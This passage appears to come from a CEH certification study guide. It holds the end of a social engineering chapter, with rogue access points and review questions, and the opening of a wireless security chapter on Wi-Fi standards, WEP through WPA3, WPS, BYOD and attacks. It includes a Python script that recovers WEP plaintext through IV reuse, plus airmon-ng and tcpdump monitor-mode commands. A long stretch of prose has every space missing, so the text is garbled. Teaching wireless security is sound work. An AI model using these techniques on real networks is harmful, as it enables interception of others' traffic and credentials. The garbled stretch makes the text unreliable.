Wireless network access is common today, especially with so many devices that can't support wired network access. This is another area where you can run a social engineering attack. You can set up a rogue access point with an enticing name to get people to connect and give up information. You could also use an existing SSID, jamming access to the authentic access point. This means legitimate users can be forced to attempt authentication against your access point and you can gather credentials or any other information, since once they are connected, all of their traffic will be passing through your system.

While these attacks can be done manually, it can be easier to automate a lot of them. There are some good tools to help. They include wifiphisher, which can automate the creation of a rogue access point. The SET is another tool that can automate social engineering attacks. It uses Metasploit and the payloads and modules to support these attacks.

Review Questions

You can find the answers in the appendix.

1. You get a phone call from someone telling you they are from the IRS and they are sending the police to your house now to arrest you unless you provide a method of payment immediately. What tactic is the caller using?
A. Pretexting
B. Biometrics
C. Smishing
D. Rogue access

2. You are working on a red-team engagement. Your team leader has asked you to use baiting as a way to get in. What are you being asked to do?
A. Make phone calls
B. Clone a website
C. Leave USB sticks around
D. Spoof an RFID ID

3. Which of the social engineering principles is in use when you see a line of people at a vendor booth at a security conference waiting to grab free USB sticks and CDs?
A. Reciprocity
B. Social proof
C. Authority
D. Scarcity

4. What is a viable approach to protecting against tailgating?
A. Biometrics
B. Badge access
C. Phone verification
D. Mantraps

5. Why would you use wireless social engineering?
A. To send phishing messages
B. To gather credentials
C. To get email addresses
D. To make phone calls

6. Which social engineering principle may allow a phony call from the help desk to be effective?
A. Social proof
B. Imitation
C. Scarcity
D. Authority

7. Why would you use automated tools for social engineering attacks?
A. Better control over outcomes
B. Reduce complexity
C. Implement social proof
D. Demonstrate authority

8. What social engineering vector would you use if you wanted to gain access to a building?
A. Impersonation
B. Scarcity
C. Vishing
D. Smishing

9. Which of these would be an example of pretexting?
A. Web page asking for credentials
B. A cloned badge
C. An email from a former co-worker
D. Rogue wireless access point

10. What tool could you use to clone a website?
A. httclone
B. curl -get
C. wget
D. wclone

11. How would someone keep a baiting attack from being successful?
A. Disable Registry cloning.
B. Disable autorun.
C. Epoxy external ports.
D. Don't browse the Internet.

12. What statistic are you more likely to be concerned about when thinking about implementing biometrics?
A. False positive rate
B. False negative rate
C. False failure rate
D. False acceptance rate
13. Which of these forms of biometrics is least likely to give a high true accept rate while minimizing false reject rates?
A. Voiceprint
B. Iris scanning
C. Retinal scanning
D. Fingerprint scanning

14. What attack can a proximity card be susceptible to?
A. Tailgating
B. Phishing
C. Credential theft
D. Cloning

15. Which form of biometrics scans a pattern in the area of the eye around the pupil?
A. Retinal scanning
B. Fingerprint scanning
C. Iris scanning
D. Uvea scanning

16. What would the result of a high false failure rate be?
A. People having to call security
B. Unauthorized people being allowed in
C. Forcing the use of a mantrap
D. Reduction in the use of biometrics

17. You've received a text message from an unknown number that is only five digits long. It doesn't have any text, just a URL. What might this be an example of?
A. Vishing
B. Smishing
C. Phishing
D. Impersonation

18. What is an advantage of a phone call over a phishing email?
A. You are able to go into more detail with pretexting.
B. Phishing attacks are unreliable.
C. Not everyone has email, but everyone has a phone.
D. Pretexting works only over the phone.

19. What is the web page you may be presented with when connecting to a wireless access point, especially in a public place?
A. Credential harvester
B. Captive portal
C. Wi-Fi portal
D. Authentication point

20. What tool could you use to generate email attacks as well as wireless attacks?
A. Meterpreter
B. wifiphisher
C. SEToolkit
D. Social Automator

Chapter 11
Wireless Security

THE FOLLOWING CEH EXAM TOPICS ARE COVERED IN THIS CHAPTER:
✓ Wireless access technology
✓ Network topologies
✓ Communication on protocols
✓ Mobile technologies
✓ Security policy implications

There was a time when you needed actual physical access to a facility to get onto a company's network. This is no longer true. These days, you likely just need physical proximity. Wireless networks are ubiquitous, especially as devices that have no ability to take in a traditional wired connection become more predominant. The problem with wireless networks, though, is that they use radio waves as the transmission medium. The signal strength isn't nearly the same as an AM or FM signal you would pick up with a radio you would listen to. The principle is the same, though. A signal is sent from a transmitter through the air, and a receiver gets the signal, as long as the receiver is within range. Because they are just radio signals, they can be intercepted if you are within range of the transmitter. You can also send your own signals.

What we traditionally call Wireless Fidelity (Wi-Fi) is a set of specifications categorized as 802.11 that are managed by the Institute of Electrical and Electronics Engineers (IEEE). 802.11 is not the only set of wireless specifications, however. Another communications protocol that uses wireless signals for transmission is Bluetooth. Both of these are common and can easily be misconfigured. Even without misconfigurations, there are enough issues in the protocols themselves to open up the possibility of compromise. These means of communications have become essential for business operations, but they are exposed. It's important to understand the protocols as well as how the protocols can be compromised. Using at least one of them, you may be able to get into systems and networks as long as you have physical proximity.

Wi-Fi

Wi-Fi encompasses the set of standards that fall under the IEEE's 802.11. Wi-Fi is actually a trademark of the Wi-Fi Alliance and is used for devices that have passed certification tests. Whether you call it Wi-Fi or 802.11, we're talking about the same thing—network connectivity over a wireless connection. This makes it seem straightforward, and in general, if you are using it, it is. However, Wi-Fi has been through several versions since its introduction, and substantial changes to how Wi-Fi operates have been made in some of those versions.

First, 802.11 is a set of specifications for the Physical and Data Link layers. The Physical layer specifies the modulation schemes used to transmit the data and also specifies the frequency spectrum used. The first version of 802.11 specified transmission in the 2.4 GHz range with data rates between 1 and 2 megabits per second. This frequency range is the same as that used by other technologies, since it falls into the industrial, scientific, and medical (ISM) band. Devices like microwaves and some cordless phones operate within the same frequency spectrum as Bluetooth devices and Wi-Fi, making it a little crowded and leading to the potential for conflict. While an early version, 802.11a, supported transmission in the 5 GHz and 2.4 GHz ranges, it wasn't widely implemented, especially in the consumer space. It wasn't until 2009, when 802.11n was released, that 5 GHz became a viable frequency to use for Wi-Fi networks. Since then, 802.11ac and the proposed 802.11ax have both been specified to work in the 5 GHz range. This causes issues, of course, since older radios in Wi-Fi interfaces won't work on anything other than the frequency they have been tuned to. If a network decided to adopt 802.11ac in the 5 GHz range but they still had a number of 802.11g cards, those cards would not be able to connect to the new network.

802.11n made significant jumps in the data throughput capability of wireless interfaces. It was able to do this through the use of multiple input, multiple output (MIMO). This meant an interface could use multiple channels for input and output and bind them together. Instead of being limited to 54 Mbits per second, it was possible to get speeds up to 600 Mbits per second using 802.11n. If your access point supported MIMO but your card did not, you would still be limited to the lower bandwidths because your card was not capable of doing anything better than a single channel at 54 Mbits per second, at a maximum.

802.11 uses channels to prevent one set of signals from clobbering another set. In the United States, there are 11 channels that can be used for Wi-Fi communications in the 2.4
GHzband.Achannelisaboundedrangeoffrequencies,muchlikechannelsonaTVoraparticularradiostation.Eachofthoseisallocatedarangeoffrequenciesonwhichtotransmit,dependingontheamountofbandwidthneeded.Somepartsoftheworldareallowedtouse13channels.Thisisdependentontheregulatorybodythatmanagesthefrequencyspectrumforelectromagnetictransmissions.Ifyouareusingaversionof802.11thatsupportstransmissioninthe5 GHzrange,thereareotherchannelsthatareavailable,thoughthatalsovariesfromonecountrytoanother.Thereislessconsistencyregardingtheuseofthe5 GHzrangearoundtheworldthanthereiswiththe2.4 GHzrange.Laterversionsof802.11operateorwilloperateinthe60 GHzrange,andtherearesixchannelsforuseinthatrange.Anotheraspectthatvariesfromoneversionof802.11toanotheristhedistancethesignalisexpectedtotravel.Someofthe802.11versionswillcarryonly11feetorso.Othersareexpectedtocarryuptoacoupleofhundredfeet.Thisvariesquiteabitdependingonthenumberofwallsandthecompositionofthewalls.AWi-­Fisignalcancarryquiteabitfartheroutsidebecausethereisnothingtoimpedethesignal.Insideisaverydifferentstory.Intermsofcapturingsignalwithoutactuallybeinginthebuilding,howfarfromthebuildingyouneedtobewilldependonhowclosethenearestaccesspointistoanexternalwallandhowmanywindowsthereare.Windowswouldgenerallyallowthesignaltopassoutunimpeded.TherearetwodifferentwaystosetupWi-­Finetworksfromatopologicalperspective.Oneoftheseisfarmorecommonthantheother,butit’sstillpossibletoseeboth.Beyondthat,youneedtobeconcernedwithhowtheWi-­Finetworkhandlesauthenticationandencryption.Bothauthenticationandencryptionmechanismsprovidepossiblewaystoattack442 Chapter11  
WirelessSecurity■thewirelessnetwork.Thisisespeciallytrueincaseswherecompaniesallowemployeestoattachtheirowndevicestothecorporatenetwork.TestingTipIfyouareusingWi-­Fitesting,itishelpfultohaveasecondWi-­FiinterfaceifyouareusingWi-­Fiasyourprimarymeansofaccessingthenetwork.Ifyouaretryingtotestwiththesameinterfaceyouareotherwiseconnectedtothenetworkwith,youmayendupwithabumpyride.YoucaneasilygetasecondaryWi-­FiinterfacethatconnectswithUSB.Thiswayyoucandoyourtestingoveroneinterfacewithoutdisconnectingyournetworkconnectionsoveryourprimaryinterface.Wi-­FiNetworkTypesTherearetwotypesofwirelessnetworksyouaregoingtoruninto.Wecantalkabouttopologyherebecauseit’stechnicallyrelevant,thoughitmaybehardertoconceptualizethanwithwirednetworks.Let’sgiveitashot,though.Thefirsttypeofnetwork,andonethatislesscommon,especiallyinabusinessenvironment,isanadhocnetwork.Anadhocnetworkisonethatexistswithoutanycentralroutingorswitchingdevice.Figure 11.1showsanadhocwirelessnetworkwithdifferentdevicetypesconnectedtoit.Youcanthinkofitasadynamicmeshnetwork.Eachdevicecommunicatesdirectlywithanotherdevice.Theconnectionsarestoodupdynamicallyastwodeviceshaveaneedtotalktooneanother.Whenadevicecomesontothenetwork,itsharesitsinformationwiththeotherdevices.Theythenknowhowtomakeaconnectiontothatdeviceiftheyneedto.FIGURE 11.1 WirelessadhocnetworkWi-­Fi 443Thisisnottosaythatanyonecanconnecttoanadhocnetwork.Whenanadhocnetworkisstartedupbysomeone,theyhavetogivethenetworkaname.Inadditiontothenetworkname,apasswordmayberequiredtogainaccess.Inanadhocnetwork,allthedeviceshavetobewithinrangeofeachotherbecausethereisnothingelseinplacetoforwardmessagestootherdevicesatadistance.Whileadhocnetworksareeasytosetupandtheycanbefast,managingthemisdifficult,andtheyarecertainlynotsuitableforanenterpriseenvironment.Instead,thereareinfrastructurenetworks.Aninfrastructurenetworkhasacentraldevice,whichactslikeaswitch.Computersdon’ttalktooneanotherdirectly.Instead,allmessagesgothroughanaccesspoint.Figure 
11.2showsaninfrastructure-­basednetwork.Thedifferencebetween aswitchandanaccesspointisthattheswitchcontrolstheelectricalsignal.Sincethat’sthecase,theswitchreallydoesdeterminewhetherasystemgetsthetrafficornot.Anaccesspointhasnocontroloverwhethersystemsseethetrafficornotbecauseeverythingisintheair.Theonlythingyouneedtoseeitisaradiothatcancatchthesignals.FIGURE 11.2 WirelessinfrastructurenetworkTodemonstratethatidea,takealookatFigure 11.3.ThisisaWiresharkcapturewithmonitormodeenabledonthewirelessinterface.ThismeansWiresharkgetseverythingdowntotheradioheaders,whichisthelayer1/2setofheadersfortheframe.Thisparticularsystemisnotconnectedtoanywirelessnetwork.Youcanthinkofthatashavingawiredinterfacebeingdisconnected.Asthat’sthecase,Wiresharkshouldn’tbeseeinganything,andifmonitormodewasturnedoff,evenwithpromiscuousmodeon,therewouldn’tbeanythinginthecapture.444 Chapter11  WirelessSecurity■FIGURE 11.3 WiresharkcaptureofradiotrafficWhatyoucanseeinthecapture,though,isalotoftraffic.Thisisbecausewirelessnetworksareverychatty.Theyhavetobebecausethereisnoelectricalconnectionthattellsasystemthereisanetworkinplace.Oncemonitormodeison,though,youcanseethemessagesbetweentheaccesspointandtheclients.Forexample,accesspointssendoutbeaconframesperiodically.Theseareusedtoannouncethepresenceofthenetworkinthearea.Additionally,clientswillsendoutproberequeststoidentifynetworksinthearea.Whenaproberequestissentout,theaccesspointwillsendoutaproberesponse.Ifyoupullupalistofthewirelessnetworksinthearea,youmayseeyouroperatingsystem,indicatingthatitislookingfornetworksinthearea.Thismeansitissendingoutprobemessages.Toconnecttoanetwork,youneedtofirstidentifythenetwork.WiresharkCaptureEnableamonitormodeinWiresharkonyourwirelessnetworkinterfaceandcapturetraffic.Observetheradiotransmissionsthatpassbackandforthbetweenyoursystemandyouraccesspoint.Disconnectfromyourwirelessnetwork,andthenreconnect.Observetheradiotrafficbetweenasyoureauthenticatetothenetwork.Wi-­Fi 
Wi-Fi Authentication

There are different forms of authentication that happen on Wi-Fi networks. The first we are going to go over is a simple machine-level authentication. This is where your client associates with the network. For that to happen, your system will send out probe requests to identify wireless networks in the area. Your client is looking for a service set identifier (SSID), which is essentially the name of your network. There may be multiple access points in a network that carry the same SSID, though, since you may have a large facility and the signal from a single access point isn't enough to cover all of it. To distinguish one access point from another when they are using the same SSID, there is a basic service set identifier (BSSID). This is the MAC address of the access point's radio, and it provides a way for a client to communicate with a specific access point, as needed. You can see an example of multiple BSSIDs using the same SSID in Figure 11.4.

FIGURE 11.4 Multiple BSSIDs for a single SSID

The process for getting your client connected to the access point requires that it authenticate with the access point. This may be a simple process, particularly if the access point uses Open System authentication. This step exists to let the client start the conversation with the network; it proves nothing about who the client is. Actual authentication, particularly at the user level, happens later. The client sends an authentication request, and the access point will typically respond with an authentication response indicating "Successful." This allows the client to move to the next stage. Once the client has been authenticated, the next step is to associate the client with the network. This involves the client sending an association request to the access point. In the association request, the client, or station as it may be called, sends its capabilities. This would include the versions and speeds it supports. This allows the access point and the station to negotiate the way they are going to communicate going forward. In Figure 11.5, you can see a diagram of the process that is required to get the station authenticated and associated with the access point.

FIGURE 11.5 Authentication and association steps (exchange between the client/station and the access point: Authentication Request, Authentication Response, Association Request, Association Response)

Of course, this is only part of the process required to get a station onto the network. There is probably also user-level authentication that's required. This authentication may make use of the IEEE's 802.1X standard. 802.1X allows for network-level authentication. It can also be used on wired networks to ensure that there aren't rogue devices in use. The newer versions of Wi-Fi encryption support enterprise authentication, which may use 802.1X to ensure that the user is authorized to get access to the network.

Wi-Fi Encryption

An initial concern about wireless networks, especially when the technology started to be offered for commercial use, was privacy. Wired networks were considered to be private because in order to see any of the transmissions over a wired network, an attacker had to have physical access to the network. While this wasn't entirely true, there was still a requirement to provide similar privacy to wireless networks. Wired Equivalent Privacy (WEP) was born.

WEP used either a 40-bit key or a 104-bit key. The 40-bit key was concatenated with a 24-bit initialization vector (IV), a value that changes from frame to frame, to create the 64-bit key fed to the Rivest Cipher 4 (RC4) stream cipher. When you configured an encryption key into an access point, you entered 10 hexadecimal digits. Each hexadecimal digit is 4 bits, so 10 hexadecimal digits is the 40 bits needed. The key value was small because of U.S. government restrictions on exports of cryptography. Those restrictions were eventually lifted, allowing a larger key value. Once encryption restrictions were lifted, vendors could use a 104-bit key provided by the network administrator. Along with the 24-bit initialization vector, that created a 128-bit key, doubling the key length but exponentially increasing the number of keys an attacker would have to try. That assumed, however, that the way the key was used was sound. As it turns out, it wasn't, and the key length is not what broke WEP. The IV is sent in the clear with every frame, and 24 bits allows only about 16 million values, so on a busy network IVs repeat within hours and frames encrypted under the same IV share the same RC4 keystream. Worse, the way WEP prepends the IV to the secret key exposes a weakness in RC4's key scheduling: for certain "weak" IVs, the first bytes of keystream leak information about the key bytes. With enough captured frames, tens of thousands on a busy network, the secret key can be recovered outright, which is why WEP is considered cracked. Fortunately, there are other encryption mechanisms that can be used.
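The IV reuse problem just described can be shown with a few lines of code. The following is an added example, not code from the study guide: it implements RC4 (which is no longer shipped in standard crypto libraries), encrypts two constructed frames the way WEP does, and recovers one frame's plaintext from the other without the key. The WEP key, the IV and the frame contents are made up for the demonstration; the one real-world constant is the LLC/SNAP header that starts every IP frame on 802.11, which is why an attacker always has some known plaintext to work with.

```python
"""WEP keystream reuse: two frames under the same 24-bit IV share an RC4
keystream, so the known bytes of one frame reveal the other frame's bytes.

Added example, not code from the CEH study guide. RC4 is implemented inline;
the key, IV and frame payloads below are constructed for the demonstration."""
import math


def rc4_keystream(key: bytes, length: int) -> bytes:
    # Key-scheduling algorithm (KSA)
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    # Pseudo-random generation algorithm (PRGA)
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(secret_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP builds the per-frame RC4 key as IV || secret key and sends the IV in the clear."""
    if len(iv) != 3:
        raise ValueError("WEP IVs are 24 bits")
    keystream = rc4_keystream(iv + secret_key, len(plaintext))
    return iv + bytes(p ^ k for p, k in zip(plaintext, keystream))


# Every IP datagram carried in an 802.11 data frame starts with this LLC/SNAP header,
# so at least these 8 bytes of plaintext are always known to an eavesdropper.
LLC_SNAP_IP = bytes.fromhex("aaaa030000000800")


def recover_from_iv_reuse(frame_a: bytes, frame_b: bytes, known_plaintext_a: bytes) -> bytes:
    """Given two WEP frames that share an IV and the known leading bytes of frame A's
    plaintext, return the corresponding bytes of frame B's plaintext. No key needed:
    C_a XOR P_a gives the keystream, and keystream XOR C_b gives P_b."""
    if frame_a[:3] != frame_b[:3]:
        raise ValueError("different IVs: keystreams differ, nothing to recover")
    ct_a, ct_b = frame_a[3:], frame_b[3:]
    n = min(len(known_plaintext_a), len(ct_a), len(ct_b))
    keystream = bytes(c ^ p for c, p in zip(ct_a[:n], known_plaintext_a[:n]))
    return bytes(c ^ k for c, k in zip(ct_b[:n], keystream))


def frames_until_iv_collision(probability: float = 0.5, iv_bits: int = 24) -> int:
    """Birthday bound: number of frames after which some IV has repeated with the
    given probability, assuming IVs are chosen uniformly at random."""
    space = 2 ** iv_bits
    return math.ceil(math.sqrt(2 * space * math.log(1 / (1 - probability))))


# Constructed sample (assumed values, not a real capture)
WEP_KEY = bytes.fromhex("0123456789")          # 40-bit key, 10 hex digits as entered on an AP
IV = bytes.fromhex("1a2b3c")
PLAINTEXT_A = LLC_SNAP_IP + b"frame the tester injected, so its plaintext is fully known"
PLAINTEXT_B = LLC_SNAP_IP + b"user=admin&password=hunter2"
FRAME_A = wep_encrypt(WEP_KEY, IV, PLAINTEXT_A)
FRAME_B = wep_encrypt(WEP_KEY, IV, PLAINTEXT_B)   # same IV: same keystream

if __name__ == "__main__":
    print(recover_from_iv_reuse(FRAME_A, FRAME_B, PLAINTEXT_A))
    print("frames for a 50% chance of an IV repeat:", frames_until_iv_collision())
```

Frame A here stands in for traffic whose plaintext the tester knows completely, for example a packet they sent into the network themselves; with only the LLC/SNAP header known, the same function still yields the first 8 bytes of keystream for that IV, which is the foothold the chopchop and fragmentation attacks build on.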
Wi-Fi Protected Access

Encryption is complex, and encryption schemes are under constant scrutiny. As noted, WEP was cracked. Improvements in technology, especially computing power, have made cracking encryption much easier, which generally limits the shelf life of new encryption mechanisms. Because of that, you may understand why it is time-consuming to develop new ways to encrypt data. WEP was considered problematic, but it couldn't be swapped out with a long-term solution easily. As a stopgap measure, the Wi-Fi Alliance released Wi-Fi Protected Access (WPA). WPA could be implemented without any hardware changes. The hardware that allowed WEP to function could also be used for WPA; WPA could be enabled with a firmware upgrade.

WPA introduced the Temporal Key Integrity Protocol (TKIP). Where WEP concatenated the initialization vector with the pre-shared key, TKIP mixes them: a two-phase key mixing function combines a 128-bit temporal key, the transmitter's MAC address, and a 48-bit per-packet sequence counter to produce a different RC4 key for every frame. This is part of what allowed WEP-capable hardware to work with WPA: the same RC4 engine is used, just fed a key derived in a safer way. The temporal key is established for the session and rotated, rather than being fixed for the life of the network as the WEP key was, and the per-packet key derived from it means that two frames never share an RC4 key. This was meant to address one of the issues with WEP, where a collection of frames could yield enough data to derive the key because of the weakness in how the initialization vector was combined with the key.

As far as integrity goes, messages in transit could be intercepted and altered. WEP used a cyclic redundancy check (CRC) to verify the integrity of the message. Because a CRC is linear and unkeyed, an attacker can flip bits in the ciphertext and fix up the CRC so the change goes unnoticed, so this was considered inadequate. Instead, WPA implemented a keyed message integrity check (MIC, an algorithm called Michael), which is a form of message authentication code (MAC). This is not to be confused with the media access control (MAC) address. This MAC is meant to verify the integrity and authenticity of the message that has been sent. The receiving party checks its own calculation of the MAC against the one included with the message. If the MACs match, the message has not been tampered with or otherwise corrupted in transit.

WPA supports two modes of authentication. The first functions essentially the same as the key used in WEP and is called WPA-Personal. This is a pre-shared key (PSK) method. The PSK functions as a password and also provides the master key from which the temporal keys used with RC4 are derived. The second mode of authentication, called WPA-Enterprise, uses the Extensible Authentication Protocol (EAP). EAP can be used to support different backend password storage. As an example, you can use WPA-Enterprise with your existing enterprise user database and authentication scheme, such as Windows Active Directory. EAP is used to transmit authentication information along with success or failure responses.

Another means of authentication is Wi-Fi Protected Setup (WPS). This can require physical control of the access point, since it may involve pushing a button. There may also be a personal identification number (PIN) needed to complete WPS. It is used to handle key distribution so the users of the client devices don't need to know what the key is. The key is stored with the endpoint and is used to communicate with the access point when devices come online. There are issues with WPS, however. The eight-digit PIN is verified in two halves, the last digit is a checksum, and the access point reports which half failed, so an online brute force needs at most about 11,000 guesses rather than 100 million; once the PIN is recovered, the access point hands over the WPA pre-shared key. Many consumer access points ship with WPS enabled, so disabling it is one of the cheapest wireless hardening steps there is.

Wi-Fi Protected Access 2

Wi-Fi Protected Access 2 (WPA2) is the Wi-Fi Alliance's certification for the security amendment ratified as IEEE 802.11i-2004, which means it's an amendment to the original 802.11. There have been several other amendments, including ones that provide the capability to handle MIMO streams as well as different channels and bandwidths. You may be familiar with them as 802.11b, 802.11g, 802.11n, and others. WPA2 was intended to be the long-term solution to the problems with WEP. Some of the problems with WEP continued with the use of WPA, since WPA continued to use the RC4 stream cipher. RC4 is an older cipher with known biases in its keystream, and TKIP still builds each per-packet key around an initialization vector; a poorly implemented key mixing or IV scheme can lead to keys being derived, just as with WEP. WPA2 replaces RC4 and TKIP with AES in CCMP mode and improves the overall security of the encryption implementation for Wi-Fi.

One of the biggest issues with encryption has always been protection of the key. 802.11i formalized a four-way handshake, used by both WPA and WPA2, that establishes session keys without the master key ever going over the air. There are two keys that matter through this process. The first is the pairwise master key (PMK), which is retained over time, so it has to be protected and never transmitted. In Personal mode the PMK is derived from the passphrase and the SSID (PBKDF2 with 4,096 iterations of HMAC-SHA1); in Enterprise mode it comes out of the EAP exchange. The key that gets derived from it for the session is the pairwise transient key (PTK), which is split into a key confirmation key (KCK) used to compute the handshake MICs, a key encryption key (KEK) used to wrap key material, and the temporal key that actually encrypts data frames. There is also a group temporal key (GTK) that is delivered during the handshake; it is used for broadcast and multicast traffic, meaning it's a key that is shared across all devices on the network.

Figure 11.6 shows a diagram of what the four-way handshake process looks like. First, the access point generates a nonce, which is an ephemeral, random value. The access point sends its nonce (the ANonce) to the station, along with a key replay counter, which is used to match messages that are sent so any replayed messages get discarded. The station has what it needs at this point to generate the PTK: the PMK, the two nonces, and the two MAC addresses. The station generates its own nonce (the SNonce) and sends it to the access point, along with the key replay counter that matches the one sent by the access point. The station also sends a message integrity code (MIC, a message authentication code keyed with the KCK) to ensure there is no tampering with the message that is sent. Once the access point has the station's nonce, it can derive its own PTK and check the station's MIC. The access point sends the GTK, encrypted under the KEK, on to the station, along with a MIC. The station sends along an acknowledgment, also with a MIC, and the four-way handshake is complete. The four-way handshake completes authentication, since you have to have the right PMK in order to be able to produce valid MICs. Note what an eavesdropper gets to see: both nonces, both MAC addresses, and the MICs all go over the air in the clear. Only the PMK is secret, which is why a captured handshake from a Personal-mode network can be attacked offline by guessing passphrases.

Just as with WPA, there is Personal and Enterprise authentication available, and the handshake process is the same, no matter which method of authentication is used. Personal requires a pre-shared key. Enterprise authentication uses 802.1X to handle user-level authentication, meaning someone connecting to the network has to provide a username and password or a certificate. The authentication framework used is the Extensible Authentication Protocol (EAP) and the different variations of EAP. Figure 11.7 shows a list of different EAP variations and other authentication protocols that may be used. This is from a configuration page on a Linux system, setting up a wireless network connection.

FIGURE 11.6 Four-way handshake for WPA2 (between STA and AP: ANonce from the AP; STA constructs the PTK; SNonce + MIC from the STA; AP constructs the PTK; GTK + MIC from the AP; Ack from the STA)
FIGURE 11.7 Wireless configuration under Linux

A couple of common variations are the Lightweight Extensible Authentication Protocol (LEAP) and the Protected Extensible Authentication Protocol (PEAP). These frameworks, along with others, like EAP-TLS, are used to ensure that the authentication is done over a protected channel so any authentication parameters are not sent in the clear. Additionally, any key exchange is done across a protected channel. Often, this is over Transport Layer Security (TLS). This is the means by which web traffic is encrypted. It makes use of certificates and asymmetric key encryption using public and private keys. LEAP is the exception: it is a Cisco proprietary scheme built on MS-CHAP challenge/response without a TLS tunnel, and captured LEAP exchanges can be cracked offline with a dictionary attack, so it is considered obsolete. Even with PEAP, the protection depends on the client validating the authentication server's certificate; a client configured to accept any certificate will hand its credentials to an attacker's RADIUS server just as readily as to the real one.

Wi-Fi Protected Access 3

In 2018, the Wi-Fi Alliance introduced Wi-Fi Protected Access 3 (WPA3) to help protect against some of the weaknesses in WPA2. The first thing is allowing stronger cipher suites: the WPA3-Enterprise 192-bit mode uses AES-256 for encryption with SHA-384 for the cryptographic hashing used to perform message authentication. Additionally, WPA3-Personal introduces Simultaneous Authentication of Equals (SAE) in place of the pre-shared key handshake. Using a pre-shared key directly is a weakness because it's a piece of information that may be hard to fully protect, and because, as noted earlier, a captured four-way handshake lets anyone test passphrase guesses offline. SAE is a password-authenticated key exchange (the Dragonfly exchange): the station and the access point prove to each other that they know the password, and agree on a fresh PMK for the session, without ever transmitting anything that can be checked against a guessed password offline. Each guess costs the attacker a live exchange with the access point, which can be rate limited, and compromising one session's keys does not expose earlier sessions.

WPA3 also continues to mandate the use of Counter Mode Cipher Block Chaining Message Authentication Code Protocol, also known as CCM mode protocol (CCMP). This is a set of cryptographic protocols put together to address weaknesses from WEP. It uses a combination of encryption along with authentication and integrity to ensure that messages were not tampered with, and that those messages originate from the correct endpoint. This protects against forged and modified frames, the building blocks of man-in-the-middle attacks on the wireless link. CCMP uses a block cipher (AES) for encryption, so messages are encrypted in fixed-length blocks, in counter mode with a CBC-MAC for integrity. A meet-in-the-middle attack is a known-plaintext attack against constructions that apply a cipher twice with independent keys; it trades memory for time so an attacker does not have to brute-force both keys together, which is why double DES gives little more strength than single DES. AES-CCMP with a single 128-bit key has no such structure, so this class of attack does not weaken it.

Bring Your Own Device

You probably have at least one mobile device, whether it's a smartphone, a tablet, or a laptop. It may also be a hybrid device like Microsoft's Surface. Because of the prevalence of these devices and their ease of use, people carry them around and have at least smartphones with them nearly all the time. Companies often want to take advantage of these computing resources, so they may have policies around how to allow people to use their own devices on enterprise networks. This policy is typically referred to as bring your own device (BYOD). A company may require devices to be approved or meet certain minimum requirements.

A company that allows personal devices on their network, generally through wireless networks because mobile devices generally don't have wired connections, may be open to any device connecting. This means they may not have a form of network access control (NAC) that can restrict which devices can talk to their wireless networks. One form of restriction is blocking MAC addresses to prevent anyone not on the whitelist from even getting to the point of user-level authentication. Keep in mind that MAC addresses are transmitted in the clear and are trivial to change, so a MAC whitelist stops accidental connections, not an attacker who has sniffed an allowed address. As shown earlier, WPA2 with Enterprise authentication also provides protection by requiring that users authenticate.

Another thing to consider when it comes to accessing over Wi-Fi is network isolation. It's common for businesses to put Wi-Fi clients into an isolated network that behaves as though it's outside the enterprise. To access internal corporate resources, anyone on the Wi-Fi network, even after authentication, has to use a virtual private network connection to get access to business assets. They connect to a password-protected Wi-Fi network using WPA2-Enterprise authentication and encryption, and then they have to further authenticate to get a tunnel open to the inside of the network. This means even if you get access to the employee Wi-Fi network, typically separate from the guest Wi-Fi network that may also be available, you still won't have easy access to business assets. Companies that have embraced BYOD, however, may have made it easier to gain access to their resources. Of course, BYOD isn't the only way employees can get access to corporate resources over Wi-Fi, but if BYOD is enabled, it likely means there aren't restrictions about which devices can connect that would prevent someone from even being able to present authentication credentials to get access.

Wi-Fi Attacks

There are different ways to attack Wi-Fi networks. First, as with any type of attack, you can start with reconnaissance. There are ways to do that using Wireshark and other tools. What you need when you are sniffing is traffic to look at. One way to get it is to force endpoints to reauthenticate themselves. You can use a deauthentication attack to do that. Another attack is something called the evil twin. This is a rogue access point, but one that mimics a legitimate access point. There is also a key reinstallation attack, sometimes called KRACK, which can be used to force endpoints to send messages in a way that attackers can decrypt them easily.

Testing Networks

You probably don't want to perform testing on your own network since it will disrupt traffic. Any device that relies on wireless connectivity for operation will stop functioning correctly when you perform some of these attacks. It would also be rude (and, in most jurisdictions, illegal) to test against your neighbors' access points. It's probably helpful to get another access point that you can test against.

Sniffing

As noted earlier, Wireshark can be used to capture network traffic that includes the radio headers.
The radio headers are important when you are trying to gather information. They are not the only headers that carry information, though. You will want to see all the beacons from the access points and any authentication messages that may be sent between stations and access points. To see the entire stack, you need to set your wireless interface into monitor mode. One way to do this is by using the airmon-ng program from the aircrack-ng package. In the following code listing, you can see the use of airmon-ng to create a monitor interface from a wireless interface. In the end, you have a new interface that you can use to collect radio and other traffic.

Using airmon-ng

# airmon-ng start wlan0

Found 3 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

  PID Name
  640 wpa_supplicant
30835 NetworkManager
30859 dhclient

PHY     Interface       Driver          Chipset

phy0    wlan0           rt2800usb       Ralink Technology, Corp. RT5372

                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)

You'll notice some warnings at the start. This is because the version of Linux this is running under manages the network interfaces. airmon-ng needs to be able to make changes to the network interfaces, meaning it's better if the processes managing the interfaces aren't running; airmon-ng check kill will stop them for you. While this example is running under Linux, aircrack-ng does have a Windows package, and the same programs can be used there, though monitor mode and frame injection depend on driver support, which is far better on Linux.

Once the monitor interface has been created, you can use it as you would any other network interface. You can use tcpdump to capture all network traffic that passes across the monitor interface. In the following listing, you can see the use of tcpdump using the interface wlan0mon, which was created by airmon-ng.

Using tcpdump with a Monitor Interface

# tcpdump -i wlan0mon
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on wlan0mon, link-type IEEE802_11_RADIO (802.11 plus radiotap header), capture size 262144 bytes
20:49:20.747433 1.0 Mb/s 2457 MHz 11b -19dBm signal antenna 1 Data IV: 8cae Pad 20 KeyID 2
